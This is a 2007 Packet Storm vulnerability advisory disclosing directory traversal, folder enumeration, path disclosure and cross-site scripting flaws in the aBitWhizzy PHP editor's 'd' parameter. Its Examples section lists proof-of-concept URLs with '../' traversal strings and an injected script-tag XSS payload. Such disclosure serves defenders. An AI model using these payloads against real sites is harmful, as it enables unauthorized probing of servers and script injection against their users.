abitwhizzy-traverse.txt

2007-03-29T00:00:00
ID PACKETSTORM:55452
Type packetstorm
Reporter Lostmon
Modified 2007-03-29T00:00:00

Description

                                        
                                            `################################################  
aBitWhizzy traversal folder enumeration and XSS  
vendor url: http://www.unverse.net/abitwhizzy/  
Advisore:http://lostmon.blogspot.com/2007/03/  
abitwhizzy-traversal-folder-enumeration.html  
vendor notify:YES exploit include:YES  
################################################  
  
aBitWhizzy is a php script that uses whizzywig.js to create  
and edit web pages through a WYSIWYG interface, right through  
your browser. Now your site can be updated by people with no  
knowledge of HTML, FTP or AIG (Abbreviations In General).  
  
aBitWhizzy contains a flaw that allows a remote traversal  
arbitrary folder enumeration.This flaw exists because the  
application does not validate 'd' variable upon submission  
to 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and  
'whizzery/whizzylink.php' scripts.This could allow a  
remote users to create a specially crafted URL that would  
execute '../' directory traversal characters to view folder  
structure on the target system with the privileges  
of the target web service.  
  
This input validation error permits too Cross-site scripting  
Style attacks and full path disclosure.  
  
###################  
VERSIONS  
###################  
  
Unknow version of aBitWhizzy  
  
##################  
SOLUTION  
##################  
  
No solutions was available at this time !!  
  
######################  
TIMELINE  
######################  
  
discovered:25-03-2007  
vendor notify:25-03-2007  
vendor response:---------  
Private Disclosure:25-03-2007  
public disclosure:27-03-2007  
  
#######################  
Examples  
#######################  
  
Path disclosure:  
  
http://localhost/abitwhizzy/whizzylink.php?d='  
http://localhost/abitwhizzy/whizzypic.php?d='  
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='  
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='  
  
Folder enumeration:  
  
  
http://localhost/abitwhizzy/whizzylink.php?d=  
../../../../../../../Documents%20and%20Settings  
  
http://localhost/abitwhizzy/whizzypic.php?d=  
../../../../../../../Documents%20and%20Settings  
  
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=  
/../../../../../../../Documents%20and%20Settings  
  
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=  
/../../../../../../../Documents%20and%20Settings  
  
  
Cross Site Scripting:  
  
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=  
/../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=  
/../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
http://localhost/abitwhizzy/whizzypic.php?d=  
../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
http://localhost/abitwhizzy/whizzylink.php?d=  
../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
########################### €nd ###################################  
  
Thnx to estrella Que te ailoviuu un monton ;P  
Thnx to all Lostmon´s Group Team  
  
--  
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
  
  
  
--   
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`